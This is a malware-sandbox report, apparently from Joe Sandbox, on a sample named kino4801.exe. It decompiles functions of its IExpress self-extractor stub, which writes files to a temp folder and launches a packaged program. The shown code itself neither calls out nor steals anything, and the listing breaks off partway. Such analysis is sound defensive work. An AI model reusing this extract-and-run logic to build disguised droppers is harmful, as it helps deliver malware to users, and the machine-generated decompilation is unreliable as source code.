Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: ca4100b06ea5fbe27ffe234bf854889737f050ea5f14b08fc801e3ad1a657737
Instruction ID: 062b92169c3ad91dd947db9fc6ac8c326e18d0ef7916b6f64f3920df65214d5a
Opcode Fuzzy Hash: ca4100b06ea5fbe27ffe234bf854889737f050ea5f14b08fc801e3ad1a657737
Instruction Fuzzy Hash: 5A113A71D02608DFCB14DFB9EB48A9EBBF5EF08316FA54D65D801F7250EA309A088B41

Uniqueness

Uniqueness Score: -1.00%

Function 00E563C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E563C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xe58004; // 0x5ba1a886
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00E51781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
				E00E5658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xe59124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xe59124 = 0x80070052;
					_t37 = 0;
				}
				return E00E56CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x00e563cb
0x00e563d2
0x00e563d8
0x00e563ea
0x00e563f3
0x00e56401
0x00e56402
0x00e56410
0x00e56415
0x00e56433
0x00e56438
0x00e56449
0x00e56463
0x00e5646d
0x00e56477
0x00e56477
0x00e5647a
0x00e5643a
0x00e5643a
0x00e56444
0x00e56444
0x00e56492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00E5642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00E5645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00E5647A

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E563EB

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 1065093856-3290032183
Opcode ID: 78ae85a17fd8784c172074ee5dca14c2e7966424da173c741b09500d528fe085
Instruction ID: 881b2ea50595a7e010d06e06efc6adfcf79e0f27a32d8989608c3a7a6a98cb13
Opcode Fuzzy Hash: 78ae85a17fd8784c172074ee5dca14c2e7966424da173c741b09500d528fe085
Instruction Fuzzy Hash: B4210571A00218AFDB14DF26DC85FEB77B8EB44316F000AA9F994B3180DAB05D888F60

Uniqueness

Uniqueness Score: -1.00%

Function 00E547E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E547E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00E51680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0xe591e0; // 0x6b8e98
						 *(_t34 + 4) = _t11;
						 *0xe591e0 = _t34;
						return 1;
					}
					_t25 =  *0xe58584; // 0x0
					E00E544B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0xe58584; // 0x0
				E00E544B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x00e547e8
0x00e547f0
0x00e547f4
0x00e5480f
0x00e54811
0x00e54814
0x00e54814
0x00e54816
0x00e54817
0x00e54829
0x00e5482b
0x00e5482f
0x00e5484f
0x00e54852
0x00e54855
0x00e54855
0x00e54857
0x00e54858
0x00e54860
0x00e54865
0x00e5486a
0x00e5486f
0x00000000
0x00e54876
0x00e54831
0x00e54841
0x00e54847
0x00e5480b
0x00000000
0x00e5480b
0x00e547f6
0x00e54806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00E54E6F), ref: 00E547EA
LocalAlloc.KERNEL32(00000040,?), ref: 00E54823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00E54847

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E54851

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 359063898-3290032183
Opcode ID: a754663828606c1a0a32e7503b0123da82b3382cc0fb1ac57870b2ce6ed4b6a4
Instruction ID: ed8cd12a2d216ba4098b43637df68fdb325322f4a9aa3f3d610d082b9f14078d
Opcode Fuzzy Hash: a754663828606c1a0a32e7503b0123da82b3382cc0fb1ac57870b2ce6ed4b6a4
Instruction Fuzzy Hash: 1811E7F52047416FD71D9F349C18BB63B99E78530AB149D19FD42B7281DA358C4E8660

Uniqueness

Uniqueness Score: -1.00%

Function 00E53680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E53680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x00e5368c
0x00e5368f
0x00e53691
0x00e5369f
0x00e536a7
0x00000000
0x00000000
0x00e536ba
0x00000000
0x00e536bc
0x00e536bc
0x00e536c0
0x00e536cb
0x00e536c2
0x00e536c4
0x00e536c4
0x00e536da
0x00e536e0
0x00e536e6
0x00000000
0x00000000
0x00e536e6
0x00000000
0x00e536ba
0x00e536ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E5369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E536B2
DispatchMessageA.USER32(?), ref: 00E536CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E536DA

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: b96706903daf625bb7eccb5a8c50a589ad55660936927ad32b7bd5de92ec8f36
Instruction ID: 6e01cc4a25367765bd4c20540421aa9645c7300eabfb9c11d8c215e752361a45
Opcode Fuzzy Hash: b96706903daf625bb7eccb5a8c50a589ad55660936927ad32b7bd5de92ec8f36
Instruction Fuzzy Hash: B10184729012187BDB308AA75C48EEB7B7CEB85B52F04062DBE05F2180D5A0C648C671

Uniqueness

Uniqueness Score: -1.00%

Function 00E565E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E565E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x00e565e8
0x00e565ed
0x00e565ef
0x00e565f2
0x00e565f4
0x00e565f4
0x00e565f6
0x00e565f7
0x00e56608
0x00e56611
0x00e56618
0x00e5661c
0x00000000
0x00000000
0x00e5660e
0x00e56623
0x00e56625
0x00e5663b
0x00e5663b
0x00e5663d
0x00e56641
0x00e56610
0x00e56610
0x00000000
0x00e56610
0x00e56644
0x00e56647
0x00e56647
0x00e56621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00E52B33), ref: 00E56602
CharPrevA.USER32(?,00000000), ref: 00E56612
CharPrevA.USER32(?,00000000), ref: 00E56629
CharNextA.USER32(00000000), ref: 00E56635

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 3fabd38dceae6437ec337847c1f87f4d22a41f0afd54100d859b15795a70ecdf
Instruction ID: 51548385bf97e96e9ccc66485291550ffc3f623fddbdaa2f8ddd6a73d28b35b9
Opcode Fuzzy Hash: 3fabd38dceae6437ec337847c1f87f4d22a41f0afd54100d859b15795a70ecdf
Instruction Fuzzy Hash: 4FF02D711055506ED7361B298C888BBBF9CCF8735BB5D0ABFE991B3011D6950D0E8761

Uniqueness

Uniqueness Score: -1.00%

Function 00E569B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E569B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0xe581f8 = E00E56C70();
				__set_app_type(E00E56FBE(2));
				 *0xe588a4 =  *0xe588a4 | 0xffffffff;
				 *0xe588a8 =  *0xe588a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0xe58528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0xe5851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00E57000();
				if( *0xe58000 == 0) {
					__setusermatherr(E00E57000);
				}
				E00E571EF(_t6);
				return 0;
			}

0x00e569b7
0x00e569c2
0x00e569c8
0x00e569cf
0x00e569d8
0x00e569de
0x00e569e4
0x00e569e6
0x00e569ec
0x00e569f2
0x00e569f4
0x00e56a00
0x00e56a07
0x00e56a0d
0x00e56a0e
0x00e56a15

APIs

Part of subcall function 00E56FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00E56FC5

__set_app_type.MSVCRT ref: 00E569C2
__p__fmode.MSVCRT ref: 00E569D8
__p__commode.MSVCRT ref: 00E569E6
__setusermatherr.MSVCRT ref: 00E56A07

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: c0b7b83c1c240f4880f15cc24f6b1959f9e09baecb882fbfe87e2191994ea711
Instruction ID: 78dc371374a4a4e3b2d512f24dfa77f98dcd98661bf9ee9997134d82e9abd2a0
Opcode Fuzzy Hash: c0b7b83c1c240f4880f15cc24f6b1959f9e09baecb882fbfe87e2191994ea711
Instruction Fuzzy Hash: C0F07A745093018FD65C6B75AE0B6193BA1E704333B541E19E892B62F1DF3A855DCA11

Uniqueness

Uniqueness Score: -1.00%

Function 00E56952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E56952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0xe55760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}

0x00e5695b
0x00e56960
0x00e56963
0x00e56966
0x00e56969
0x00e5696c
0x00e56972
0x00e56987
0x00e5699f
0x00e5699f
0x00e56987
0x00e569a7

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W,?,00000000,00E55760,?,A:\), ref: 00E5697F
MulDiv.KERNEL32(?,?,00000400), ref: 00E56999

Strings

`W, xrefs: 00E56972, 00E56975

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `W
API String ID: 1705453755-2113494416
Opcode ID: 7a917e980b85579576c577a2cec1a967a605c88055907cb863f4101a840eb680
Instruction ID: 8aca2757eab9481d2a7de849c418b1cee81a4ebf4d28a343f3ce801a8910d5ca
Opcode Fuzzy Hash: 7a917e980b85579576c577a2cec1a967a605c88055907cb863f4101a840eb680
Instruction Fuzzy Hash: 7DF0F9B6D0122CBBCB11DFE9CD44ADEBBBCEB48701F544696E910F3240DA719A048BD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kino4801.exePID: 6116, Parent PID: 6028COMMON

Execution Graph

Execution Coverage:	26.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	967
Total number of Limit Nodes:	41

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 010D3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E010D3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x10d8004; // 0x261cebeb
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x10d9124 =  *0x10d9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x10d8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x10d8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E010D468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x10d9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E010D1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E010D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E010D3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x10d8580;
													if( *0x10d8580 != 0) {
														E010D2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x10d8180;
											if( *0x10d8180 == 0) {
												_t146 = 0x4c7;
												E010D44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x10d9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x10d9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E010D6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E010D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x10d9124 = E010D6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E010D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x10d8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x10d9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x10d8a38 & 0x0000ffff;
											_v380 = 0x10d9154;
											_v376 = _t151;
											_v372 = 0x10d91e4;
											_v360 = _t97;
											if( *0x10d8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x10d9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x10d8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x10d9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x10da288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x10d9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x10d9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x10d8a20;
										if( *0x10d8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E010D202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E010D468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x10d8c42;
									if( *0x10d8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x10d8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E010D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E010D468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E010D1781( &_v276, 0x104, _t130, 0x10d8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E010D468F(_t130, 0x10d9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x010d3baa
0x010d3bb0
0x010d3bb7
0x010d3bc0
0x010d3bc2
0x010d3bc9
0x010d3bcb
0x010d3bcf
0x010d3bd3
0x010d3bd9
0x010d3bfd
0x010d3bfd
0x010d3bff
0x010d3c03
0x010d3c03
0x010d3c11
0x010d3c16
0x010d3c19
0x010d3c28
0x00000000
0x00000000
0x010d3c30
0x010d3c39
0x010d3c40
0x010d3d13
0x010d3d15
0x010d3d21
0x010d3d26
0x00000000
0x010d3c4f
0x010d3c56
0x010d3c60
0x010d3c65
0x010d3c77
0x010d3c78
0x010d3c7c
0x010d3c7e
0x010d3c82
0x010d3c82
0x00000000
0x010d3c7c
0x010d3c67
0x010d3c69
0x010d3c6d
0x00000000
0x010d3c58
0x010d3c58
0x010d3c6e
0x010d3c6e
0x010d3c87
0x010d3c89
0x010d3d4d
0x010d3d4f
0x010d3d50
0x010d3d52
0x010d3d9e
0x010d3da8
0x010d3daf
0x010d3db4
0x010d3db6
0x010d3f4d
0x010d3f4d
0x010d3f4f
0x010d3f56
0x010d3f57
0x010d3f58
0x010d3f63
0x010d3f63
0x010d3dbc
0x010d3dc0
0x010d3dc2
0x010d3de6
0x010d3de6
0x010d3de8
0x010d3f0b
0x010d3f0b
0x010d3f0f
0x010d3f13
0x010d3f15
0x010d3f1a
0x010d3f1c
0x010d3f46
0x010d3f47
0x00000000
0x010d3f47
0x010d3f1e
0x010d3f1f
0x010d3f25
0x010d3f26
0x010d3f2a
0x010d3f2d
0x010d3fd9
0x010d3fd9
0x010d3fda
0x010d3fda
0x010d3fe1
0x010d3fe3
0x010d3fe3
0x010d3fe8
0x00000000
0x010d3fe8
0x010d3f33
0x010d3f37
0x00000000
0x010d3f37
0x010d3dee
0x010d3dee
0x010d3df5
0x010d3fad
0x010d3fb9
0x010d3fc2
0x010d3fc8
0x00000000
0x010d3fc8
0x010d3dfb
0x010d3dfd
0x00000000
0x00000000
0x010d3e03
0x010d3e0a
0x00000000
0x00000000
0x010d3e15
0x010d3e17
0x010d3e19
0x010d3f94
0x010d3fa4
0x010d3f7c
0x010d3f80
0x010d3f8b
0x00000000
0x010d3f8b
0x010d3e2c
0x010d3e30
0x010d3e34
0x010d3e36
0x010d3f69
0x010d3f6e
0x010d3f70
0x010d3f76
0x00000000
0x010d3f76
0x010d3e3c
0x010d3e43
0x010d3e47
0x010d3e52
0x010d3e56
0x010d3e5c
0x010d3e61
0x010d3e68
0x010d3e70
0x010d3e74
0x010d3e7c
0x010d3e80
0x010d3e82
0x010d3e82
0x010d3e87
0x010d3e87
0x010d3e8b
0x010d3e91
0x010d3e94
0x010d3e96
0x010d3e96
